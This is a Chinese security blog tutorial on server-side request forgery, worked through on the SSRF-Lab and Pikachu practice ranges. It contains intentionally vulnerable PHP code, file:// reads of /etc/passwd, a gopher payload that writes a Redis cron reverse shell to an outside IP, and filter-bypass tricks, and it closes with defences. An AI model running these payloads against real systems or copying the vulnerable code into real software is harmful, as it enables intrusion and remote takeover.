WEB常见漏洞之SSRF(靶场篇)
2023-1-30 08:1:30 Author: 灰帽安全(查看原文) 阅读量:31 收藏

免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

靶场地址:

https://github.com/m6a-UdS/ssrf-labhttps://github.com/zhuifengshaonianhanlu/pikachu

0x01 概述

SSRF 主要是由于一些危险函数与危险协议产生的。我们以 PHP 为例,

列举一下这些危险函数

file_get_contents()fsockopen()curl_exec()SoapClient

危险协议

file://gopherdictetc...

0x02 SSRF利用方式

主要分为两个方向,SSRF 利用相关的危险函数;SSRF 可利用的协议操作

SSRF 利用相关的危险函数

以 PHP 为例,说明一些可利用的危险函数

1. file_get_contents() 与 readfile()

file_get_contents这一函数是把 **传入的参数(变量)**写入字符串,当把 传参是内网文件的时候,会先去吧这个文件的内容读出来再写入,导致了任意文件读取,也就是信息泄露的一种。一般这种攻击也与目录遍历相结合。

测试代码:

// ssrf.php<?php$url = $_GET['url'];;echo file_get_contents($url);?>

2. fsockopen()

fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接,初始化一个套接字连接到指定主机(hostname),实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接,进行传输原始数据。fsockopen() 将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())如果调用失败,将返回false。

测试代码:

// ssrf.php<?php$host=$_GET['url'];$fp = fsockopen($host, 80, $errno, $errstr, 30);if (!$fp) {    echo "$errstr ($errno)<br />\n";} else {    $out = "GET / HTTP/1.1\r\n";    $out .= "Host: $host\r\n";    $out .= "Connection: Close\r\n\r\n";    fwrite($fp, $out);    while (!feof($fp)) {        echo fgets($fp, 128);    }    fclose($fp);}?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页,这种更像是一种重定向 (302) 之类的,没什么用。 

3. curl_exec()

curl_init(url) 函数初始化一个新的会话,返回一个 cURL 句柄,供curl_setopt(),curl_exec()和curl_close()函数使用。

测试代码:

// ssrf.php<?php if (isset($_GET['url'])){  $link = $_GET['url'];  $curlobj = curl_init(); // 创建新的 cURL 资源  curl_setopt($curlobj, CURLOPT_POST, 0);  curl_setopt($curlobj,CURLOPT_URL,$link);  curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项  $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器  curl_close($curlobj); // 关闭 cURL 资源,并且释放系统资源   // $filename = './curled/'.rand().'.txt';  // file_put_contents($filename, $result);   echo $result;}?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页:

但是攻击方式不止这么一点,其实是可以通过其他方式提高curl_exec()这里的攻击危害的。

最常见的是通过file、dict、gopher这三个协议来进行渗透

curl -vvv 'dict://127.0.0.1:6379/info' curl -vvv 'file:///etc/passwd' # * 注意: 链接使用单引号,避免$变量问题 curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

0x03 SSRF-Lab 靶场

SSRF的危险协议

可利用的常用协议:

  • file 协议结合目录遍历读取文件

  • gopher 协议打开端口

  • dict 协议主要用于结合curl攻击

  • http 协议进行内网探测

  1. file 协议利用

基础 payload:

file:///etc/password  # file:// 之后可以接任意文件

结合GET请求(实战渗透常见攻击姿势) payload:

http://ip/exp.php?url=file:///etc/password

在 SSRF-Lab 靶场中直接输入基础的payload(不用GET方式传参)即可

2. dict 协议利用

使用 dict 协议,dict://ip//info可获取本地redis服务配置信息

注:SSRF-Lab 靶场完成此操作需要另外安装 redis-server

3. gopher 协议利用

首先需要了解一下常见攻击 Redis 命令,然后转化为 Gopher 可用的协议

redis-cli -h $1 flushallecho -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1redis-cli -h $1 config set dir /var/spool/cron/redis-cli -h $1 config set dbfilename rootredis-cli -h $1 save//redis-cli查看所有的keys及清空所有的数据

这是常见exp,利用时根据需求更换 IP:Port 即可,更改为适配于 Gopher 协议的 URL

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0

URL解码为:

gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit

0x04 皮卡丘靶场

fsockopen()

fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接,初始化一个套接字连接到指定主机(hostname),实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接,进行传输原始数据。fsockopen() 将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())如果调用失败,将返回false。

测试代码:

// ssrf.php<?php$host=$_GET['url'];$fp = fsockopen($host, 80, $errno, $errstr, 30);if (!$fp) {    echo "$errstr ($errno)<br />\n";} else {    $out = "GET / HTTP/1.1\r\n";    $out .= "Host: $host\r\n";    $out .= "Connection: Close\r\n\r\n";    fwrite($fp, $out);    while (!feof($fp)) {        echo fgets($fp, 128);    }    fclose($fp);}?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页:

SSRF(file_get_content):利用file_get_content("path")利用传递的参数,通过file参数访问内部资源,或者跳转到其他服务器页面

测试代码

// ssrf.php<?php$url = $_GET['url'];;echo file_get_contents($url);?>

上述测试代码中,file_get_contents() 函数将整个文件或一个url所指向的文件读入一个字符串中,并展示给用户,我们构造类似 ssrf_fgc.php?file=../rce/rce.php 的paylaod即可读取服务器本地的任意文件(这里使用windows系统为例)

curl_exec()

curl_init(url)函数初始化一个新的会话,返回一个cURL句柄,供curl_setopt(),curl_exec()和curl_close() 函数使用

测试代码

// ssrf.php<?php if (isset($_GET['url'])){    $link = $_GET['url'];    $curlobj = curl_init(); // 创建新的 cURL 资源    curl_setopt($curlobj, CURLOPT_POST, 0);    curl_setopt($curlobj,CURLOPT_URL,$link);    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项    $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器    curl_close($curlobj); // 关闭 cURL 资源,并且释放系统资源    // $filename = './curled/'.rand().'.txt';    // file_put_contents($filename, $result);     echo $result;}?>

0x05 一些常见的绕过姿势

  1. @ 绕过

URL格式为:

[协议类型]://[访问资源需要的凭证信息]@[服务器地址]:[端口号]/[资源层级UNIX文件路径][文件名]?[查询]#[片段ID]

下面是两种访问方式(效果一样,因为解析的本来就是 @ 后面的服务器地址):

方式一、

> <a href=”http://[email protected]″”>http://[email protected]

方式二、

> http://1.1.1.1

2. 进制绕过

这里可以参考 SSRF-Lab advance 的第一题

源码

if (preg_match('#^https?://#i', $handler) !== 1) {echo "Wrong scheme! You can only use http or https!"; die();} else if (preg_match('#^https?://10.0.0.3#i', $handler) === 1) { echo "Restricted area!"; die();}

源码解读:通过正则对输入的 IP 进行了过滤,IP 地址是由四个字节组成的,一旦包含了小数点,就必须考虑到大小端表示,因为这个会影响 IP 地址的解析。不过好在所有的网络地址都是大端表示法,只需要注意这一点即可,下面我们介绍 IP 地址的表达方式。

字符串:      10.0.0.3二进制:      00001010 . 00000000 . 00000000 . 00000011十六进制:    0A.00.00.03整数:        167772163

这些表达方式都能被curl命令解析为正确的IP地址,之后如果我们要访问的IP地址被简单粗暴地过滤了就可以试试这种方法。除了上面的表达方式之外,还可以用 16 进制 0x0A000003 表示IP地址,还有一个很少人知道的绕过小姿势,就是用 8 进制代替 10 进制来表示 IP 地址。在计算机的世界里,一旦在20前面加个0就会变成8进制,比如 http://01200000003实际上还是 http://10.0.0.3,上面两个表达方式,PHP 的 curl 模块能解析出来

十六进制:http://0x0A.0x00.0x00.0x03八进制:     http://012.00.00.03八进制溢出:http://265.0.0.3

3. 句号绕过 (替换 ".")

4. xip.io 和 xip.name 绕过

泛域名解析,无需配置,将自定义的任何域名解析到指定的IP地址。假设你的IP地址是10.0.0.1,你只需使用 前缀域名+IP地址+xip.io 即可完成相应自定义域名解析

10.0.0.1.xip.io # 解析到 10.0.0.1 www.10.0.0.2.xip.io # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.io # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.io # foo.bar 子域解析到 10.0.0.4

xip.name 在使用上与xip.io一致

10.0.0.1.xip.name # 解析到 10.0.0.1 www.10.0.0.2.xip.name # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.name # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.name # foo.bar 子域解析到 10.0.0.4

5. DNS 重绑

1.判定你给的 IP 或者域名解析后的 IP 是否在黑名单中
2.若在,退出报错
3.若不在,再次访问你给的 IP 或者域名解析后的 IP;执行后续业务模块

思路:只需要有个域名,但是它映射两个 IP;同时设置 TTL 为 0,能方便两个 IP 即刻切换。

效果类比:你访问 zxc.com这个域名,第一次解析的 IP 是 192.168.0.3;而第二次解析的IP是 127.0.0.1,如此一来即可进行 SSRF 攻击

0x06 漏洞危害

  1. 扫内网

  2. 向内部任意主机的任意端口发送精心构造的Payload

  3. DOS攻击(请求大文件,始终保持连接Keep-Alive Always)

  4. 对内网web应用进行指纹识别,通过访问默认文件实现

  5. 攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sql注入等)

  6. 利用file协议读取本地文件等

0x07 漏洞防御

1.禁止跳转。
2.过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
3.限制请求的端口只能为Web端口,不需要的协议,仅仅允许http和https请求。可以防止类似于file://, gopher://, ftp:// 等引起的问题。
4.设置URL白名单或者限制内网IP(使用gethostbyname()判断是否为内网IP),以防止对内网进行攻击。
5.限制请求的端口为http常用的端口,比如 80、443、8080、8090。
6.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
7.对DNS Rebinding,考虑使用DNS缓存或者Host白名单

0x08 知识星球


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2MjYxODQ4Mw==&mid=2247484394&idx=1&sn=b374423737199d60129ddabe96d48eb3&chksm=ce0455f6f973dce0ea7a02bcfb3b0e835c126d19acea94a0d3cfadc91289f95cdc2e90ac0e24#rd
如有侵权请联系:admin#unsafe.sh